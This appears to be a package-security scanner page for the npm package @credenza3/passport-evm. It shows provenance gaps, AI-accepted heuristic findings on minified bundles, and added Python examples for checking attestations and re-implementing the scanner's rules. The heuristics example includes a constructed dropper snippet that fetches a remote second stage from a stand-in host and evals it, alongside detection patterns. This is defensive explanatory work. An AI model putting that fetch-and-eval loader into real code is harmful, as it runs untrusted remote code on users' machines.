@credenza3/passport-evm
Credenza Passport
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
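What that missing link looks like when it is present, as an added example (not code from this scanner page or from the package): an npm provenance attestation is a DSSE envelope around an in-toto statement whose subject digest is the sha512 of the published tarball and whose SLSA predicate names the source repository and pins a commit. The check below recomputes the tarball digest and compares it to the subject, then confirms the repository and commit pin. The tarball bytes, the envelope, and the repository URL are constructed for the example; signature verification against Sigstore (Fulcio certificate, Rekor inclusion) is deliberately left out and is what `npm audit signatures` adds.

```python
"""Check an npm provenance attestation against a downloaded tarball.

Added example; not code from the scanner page or from the package. It shows
the link the page says is missing when a version ships without provenance:
the attestation's subject digest must equal the tarball's digest, and the
SLSA predicate must name the source repository and pin a commit. The tarball
bytes, the DSSE envelope and the repository URL below are constructed; a real
envelope comes from the registry's attestations endpoint for the package
version. Signature verification (Sigstore bundle, Fulcio certificate, Rekor
inclusion proof) is not done here; `npm audit signatures` covers that.
"""
import base64
import hashlib
import json

IN_TOTO = "application/vnd.in-toto+json"
SLSA_V1 = "https://slsa.dev/provenance/v1"

# Constructed stand-ins (hypothetical repository; not the package's real source).
TARBALL = b"constructed tarball bytes standing in for passport-evm-0.4.27.tgz\n"
REPO = "https://github.com/example-org/passport-evm"
REF = "refs/tags/v0.4.27"
COMMIT = "0123456789abcdef0123456789abcdef01234567"


def make_statement(tarball: bytes, repo: str, ref: str, commit: str) -> dict:
    """in-toto Statement with a SLSA v1 predicate in the SLSA v1 field layout;
    every value is constructed for the example."""
    return {
        "_type": "https://in-toto.io/Statement/v1",
        "subject": [{
            "name": "pkg:npm/%40credenza3/passport-evm@0.4.27",
            "digest": {"sha512": hashlib.sha512(tarball).hexdigest()},
        }],
        "predicateType": SLSA_V1,
        "predicate": {
            "buildDefinition": {
                "buildType": "https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1",
                "externalParameters": {
                    "workflow": {"ref": ref, "repository": repo, "path": ".github/workflows/publish.yml"},
                },
                "resolvedDependencies": [
                    {"uri": f"git+{repo}@{ref}", "digest": {"gitCommit": commit}},
                ],
            },
            "runDetails": {"builder": {"id": "https://github.com/actions/runner/github-hosted"}},
        },
    }


def wrap_dsse(statement: dict) -> dict:
    """DSSE envelope shape; the signature here is a placeholder, not verifiable."""
    return {
        "payloadType": IN_TOTO,
        "payload": base64.b64encode(json.dumps(statement).encode()).decode(),
        "signatures": [{"keyid": "", "sig": base64.b64encode(b"placeholder").decode()}],
    }


def check_provenance(tarball: bytes, envelope: dict, expected_repo: str) -> dict:
    """Per-check booleans. All must be True for the tarball to be bound to expected_repo."""
    result = {"payload_type": False, "slsa_v1": False, "subject_digest": False,
              "repository": False, "source_pinned": False}
    if envelope.get("payloadType") != IN_TOTO:
        return result
    result["payload_type"] = True
    stmt = json.loads(base64.b64decode(envelope["payload"]))
    if stmt.get("predicateType") != SLSA_V1:
        return result
    result["slsa_v1"] = True
    # The subject digest is what ties the published bytes to the attested build.
    actual = hashlib.sha512(tarball).hexdigest()
    result["subject_digest"] = any(
        s.get("digest", {}).get("sha512", "").lower() == actual for s in stmt.get("subject", [])
    )
    build = stmt.get("predicate", {}).get("buildDefinition", {})
    repo = build.get("externalParameters", {}).get("workflow", {}).get("repository", "")
    result["repository"] = repo == expected_repo
    # The source must be pinned to a commit, not just a mutable ref.
    result["source_pinned"] = any(
        d.get("uri", "").startswith(f"git+{expected_repo}@") and "gitCommit" in d.get("digest", {})
        for d in build.get("resolvedDependencies", [])
    )
    return result


def bound_to_source(tarball: bytes, envelope: dict, expected_repo: str) -> bool:
    return all(check_provenance(tarball, envelope, expected_repo).values())


ENVELOPE = wrap_dsse(make_statement(TARBALL, REPO, REF, COMMIT))

if __name__ == "__main__":
    print(check_provenance(TARBALL, ENVELOPE, REPO))            # every check True
    print(check_provenance(TARBALL + b"\x00", ENVELOPE, REPO))  # subject_digest False
```

A single appended byte in the tarball breaks the subject digest while every other check still passes, which is the property a scanner is relying on when it flags the absence of provenance: without the attestation there is nothing for a modified tarball to disagree with.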
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/index-h4gUPhx9.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | net-exec-file:dist/index-h4gUPhx9.js | AI (source-diff): Network calls and dynamic execution are part of normal Svelte/ethers frontend bundle, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-Bm7eyxqh.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | obfuscated-file:dist/Payment-BXvub930.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | obfuscated-file:dist/PassportId-CJfCwaof.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | obfuscated-file:dist/App-VHOLCm-t.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentionally obfuscated. | ai | |
| source-diff | net-exec-file:dist/index-DP6hVxgX.js | AI (source-diff): Network calls and dynamic execution are part of the Svelte runtime and EVM wallet integration, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-CsxAPSvJ.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/Payment-BoS-CrfL.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/PassportId-DFq0kTjP.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/App-D_8AiOD9.js | AI (source-diff): Vite-bundled Svelte component; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/index-DP6hVxgX.js | AI (source-diff): Standard Vite/Svelte bundle output; readable runtime code, not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/App-_yMeKd6o.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | net-exec-file:dist/index-CyIvKpA2.js | AI (source-diff): Network calls and dynamic execution are part of Svelte runtime and Web3 SDK; not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-K8OByIhD.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/Payment-Dtp68V_5.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/PassportId-BeWQ-IDd.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/index-CyIvKpA2.js | AI (source-diff): Standard Vite/Svelte minified bundle output; not intentional obfuscation. | ai | |
| source-diff | obfuscated-file:dist/App-pmcYlKkW.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | net-exec-file:dist/index-BxjwuJ6T.js | AI (source-diff): Network calls are Web3/blockchain API calls; dynamic execution is Svelte runtime reactivity, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-Mm5PMzE9.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/Payment-jc4oelQs.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/PassportId-XAvunk85.js | AI (source-diff): Svelte component bundle output from Vite build; minified but not obfuscated. | ai | |
| source-diff | obfuscated-file:dist/index-BxjwuJ6T.js | AI (source-diff): Standard Vite/Svelte 5 minified bundle; readable runtime code, not obfuscated malware. | ai | |
| source-diff | obfuscated-file:dist/PassportId-BGafLUDX.js | AI (source-diff): Vite-bundled Svelte component with inline SVG data URIs; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/index-B7xlI3d8.js | AI (source-diff): Standard Vite/Svelte minified bundle output; samples show framework runtime code, not obfuscated malware. | ai | |
| source-diff | obfuscated-file:dist/App-BpcMpO5f.js | AI (source-diff): Vite-bundled Svelte component; minified but readable framework patterns, no malicious indicators. | ai | |
| source-diff | obfuscated-file:dist/Payment-BnfOGIJ0.js | AI (source-diff): Vite-bundled Svelte component; minified CSS/component code, no malicious patterns. | ai | |
| source-diff | obfuscated-file:dist/Profile-CKEg_wd-.js | AI (source-diff): Vite-bundled Svelte component; inline SVG and framework code, standard build artifact. | ai | |
| source-diff | net-exec-file:dist/index-B7xlI3d8.js | AI (source-diff): Network calls and dynamic execution are part of Svelte runtime/async component loading, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/index-CLeV97_u.js | AI (source-diff): Vite-bundled Svelte 5 runtime; minified but not obfuscated, no malicious patterns. | ai | |
| source-diff | net-exec-file:dist/index-CLeV97_u.js | AI (source-diff): Svelte 5 runtime bundle; network calls are fetch-based API calls, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-DhUeQLyL.js | AI (source-diff): Standard Vite chunk; readable Svelte component with normal imports. | ai | |
| source-diff | obfuscated-file:dist/Payment-BLCWrBYu.js | AI (source-diff): Standard Vite chunk; readable Svelte component with normal imports. | ai | |
| source-diff | obfuscated-file:dist/PassportId-IVv403Q1.js | AI (source-diff): Standard Vite chunk; contains inline SVG data URIs and Svelte component code. | ai | |
| source-diff | obfuscated-file:dist/App-WHi3tPsO.js | AI (source-diff): Standard Vite chunk output; readable Svelte component code with normal imports. | ai | |
| source-diff | obfuscated-file:dist/App-DbY3XHVH.js | AI (source-diff): Standard Vite/Svelte build output; minified module with normal ES imports. | ai | |
| source-diff | net-exec-file:dist/index-BkHP76zy.js | AI (source-diff): Svelte 5 runtime bundle; network calls are Web3/blockchain API calls, not dropper behavior. | ai | |
| source-diff | obfuscated-file:dist/Profile-BlD2oNUB.js | AI (source-diff): Standard Vite/Svelte build output; minified component code with normal imports. | ai | |
| source-diff | obfuscated-file:dist/Payment-B483NCnp.js | AI (source-diff): Standard Vite/Svelte build output; minified component code with normal imports. | ai | |
| source-diff | obfuscated-file:dist/PassportId-CLUDa9JW.js | AI (source-diff): Standard Vite/Svelte build output; contains only SVG data URIs and component code. | ai | |
| source-diff | obfuscated-file:dist/index-BkHP76zy.js | AI (source-diff): Vite-bundled Svelte 5 runtime; minified but not obfuscated, readable code visible in sample. | ai | |
| source-diff | obfuscated-file:dist/App-6EMaSmM_.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | encoded-string-file:dist/passport.umd.js | AI (source-diff): Long strings are CSS/font import rules injected by vite-plugin-css-injected-by-js; not payloads. | ai | |
| source-diff | net-exec-file:dist/index-Dllh0686.js | AI (source-diff): Network calls are Web3/API client calls; dynamic execution is Svelte runtime; no dropper pattern. | ai | |
| source-diff | obfuscated-file:dist/Profile-Ca8peQuw.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | obfuscated-file:dist/Payment-Cg6CLBP-.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | obfuscated-file:dist/PassportId-DN9CXXIx.js | AI (source-diff): Vite/Svelte component bundle; minification triggers rule but content is benign. | ai | |
| source-diff | obfuscated-file:dist/index-Dllh0686.js | AI (source-diff): Standard Vite-bundled Svelte framework output; minified but not malicious. | ai | |
| phantom-deps | phantom-dep:lean-qr | AI (phantom-deps): Declared runtime dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| phantom-deps | phantom-dep:@zerodevx/svelte-toast | AI (phantom-deps): Declared runtime dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| phantom-deps | phantom-dep:@credenza3/contracts | AI (phantom-deps): Same-org dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| install-scripts | install-script:preinstall | AI (install-scripts): only-allow pnpm enforces package manager; no code execution risk, stable pattern for this package. | ai | |
| phantom-deps | phantom-dep:lodash.merge | AI (phantom-deps): Declared runtime dep; phantom-dep heuristic false positive for bundled libraries. | ai | |
| phantom-deps | phantom-dep:ethers | AI (phantom-deps): Declared runtime dep used via bundled output; phantom-dep heuristic false positive for bundled libraries. | ai |
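The rules named in this table (obfuscated-file, net-exec-file, encoded-string-file, phantom-dep) are described only by their finding text in the per-version sections below. The following is an added example, reconstructed from that text and not the scanner's own code, that implements those heuristics and runs them over three constructed files: a Vite/Svelte-style chunk, a dropper-shaped snippet, and a file of inlined font data URIs. The indicator patterns (what counts as a network call or dynamic execution, and that `import()` counts) are assumptions; the page states the 3000-character and 200-character thresholds and the count of five.

```python
"""Re-implementation of the file-level heuristics this page reports.

Added example, reconstructed from the rule names and finding text on the
page; this is not the scanner's code, and the patterns the page does not
state (what counts as a network call, as dynamic execution, or as an
encoded string) are assumptions. The three sample files are constructed.

  obfuscated-file     : some line longer than 3000 characters
  net-exec-file       : a network call and dynamic code execution in one file
  encoded-string-file : five or more string literals of 200+ encoded characters
  phantom-dep         : a declared dependency no shipped file imports by name
"""
import re

LONG_LINE = 3000
ENCODED_MIN_LEN = 200
ENCODED_MIN_COUNT = 5

# Assumed indicator sets; the page only names the rule, not its patterns.
NETWORK_RE = re.compile(
    r"""\b(?:fetch|XMLHttpRequest|WebSocket|navigator\.sendBeacon)\s*\(|\brequire\s*\(\s*['"](?:https?|net|dns)['"]\s*\)"""
)
# import() is included because the table's reasons cite lazy component loading as the trigger.
DYN_EXEC_RE = re.compile(
    r"""\beval\s*\(|\bnew\s+Function\s*\(|\bimport\s*\(|\bsetTimeout\s*\(\s*['"]"""
)
# A string literal of 200+ base64/hex/url-safe characters, optionally a data: URI.
ENCODED_STR_RE = re.compile(
    r"""['"`]((?:data:[\w/+.-]+;base64,)?[A-Za-z0-9+/=_-]{%d,})['"`]""" % ENCODED_MIN_LEN
)
IMPORT_RE = re.compile(
    r"""(?:\bfrom\s*|\bimport\s*\(\s*|\brequire\s*\(\s*)['"]((?:@[\w.-]+/)?[\w.-]+)"""
)


def obfuscated_file(src: str) -> bool:
    return any(len(line) > LONG_LINE for line in src.splitlines())


def net_exec_file(src: str) -> bool:
    return NETWORK_RE.search(src) is not None and DYN_EXEC_RE.search(src) is not None


def encoded_string_file(src: str) -> bool:
    return len(ENCODED_STR_RE.findall(src)) >= ENCODED_MIN_COUNT


def scan(src: str) -> dict:
    """Rule name -> fired, for one shipped file."""
    return {
        "obfuscated-file": obfuscated_file(src),
        "net-exec-file": net_exec_file(src),
        "encoded-string-file": encoded_string_file(src),
    }


def fired(src: str) -> list:
    return sorted(name for name, hit in scan(src).items() if hit)


def phantom_deps(declared: list, sources: list) -> list:
    """Declared runtime deps that no shipped file imports by name. A bundler
    inlines library code into the chunk, so a bundled dep is never imported
    and looks phantom: the false positive the accepted-risks table records."""
    imported = set()
    for src in sources:
        imported.update(IMPORT_RE.findall(src))
    return sorted(d for d in declared if d not in imported)


# Constructed: how a Vite/Svelte chunk looks to these rules. One minified line
# far past 3000 chars, fetch() for an RPC call, import() for a lazy route.
VITE_CHUNK = (
    'import{a as e,b as t}from"./index-DP6hVxgX.js";'
    + "".join(f"function f{i}(n){{return e(n)+{i}}}" for i in range(300))
    + 'async function rpc(u,b){return(await fetch(u,{method:"POST",body:b})).json()}'
    + 'const P=()=>import("./Payment-BoS-CrfL.js");export{P,rpc};\n'
)

# Constructed dropper: short, readable lines; second stage fetched and eval'd.
DROPPER = (
    'const u = "https://" + ["stage2", "example", "test"].join(".") + "/s.js";\n'
    'fetch(u).then(r => r.text()).then(t => eval(t));\n'
)

# Constructed stand-in for the passport.umd.js case: five inlined font data URIs.
CSS_INJECTED = "".join(
    f'const F{i}="data:font/woff2;base64,{"QUJD" * 60}";\n' for i in range(5)
)

if __name__ == "__main__":
    for name, src in [("vite-chunk", VITE_CHUNK), ("dropper", DROPPER), ("css-injected", CSS_INJECTED)]:
        print(name, fired(src))
    print(phantom_deps(["ethers", "lodash.merge"], [VITE_CHUNK, DROPPER]))
```

Run over these inputs, the long-line rule fires on the Vite chunk and not on the dropper, so on its own it separates minified from unminified, not benign from malicious. The co-occurrence rule fires on both, because a lazy `import()` next to a `fetch()` is indistinguishable at this level from a loader. That is why each row above carries a per-file reason rather than a blanket suppression of the rule.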
Versions (showing 11 of 11)
| Version | Deps | Published |
|---|---|---|
| 0.4.27 | 7 / 28 | |
| 0.4.26 | 7 / 28 | |
| 0.4.25 | 7 / 28 | |
| 0.4.24 | 7 / 28 | |
| 0.4.23 | 7 / 28 | |
| 0.4.22 | 7 / 28 | |
| 0.4.21 | 7 / 28 | |
| 0.4.20 | 7 / 28 | |
| 0.4.19 | 7 / 28 | |
| 0.4.18 | 7 / 28 | |
| 0.4.17 | 7 / 28 | |
v0.4.27
7 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.26
7 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.25
8 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.24
7 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.23
7 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.22
8 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.21
8 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.20
8 findings
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Modified file contains 5 long encoded string(s) (200+ chars). These are commonly used to hide malicious payloads.
- Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.19
2 findings
- Preinstall script: npx only-allow pnpm
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.4.18
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.4.17
1 finding
- Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.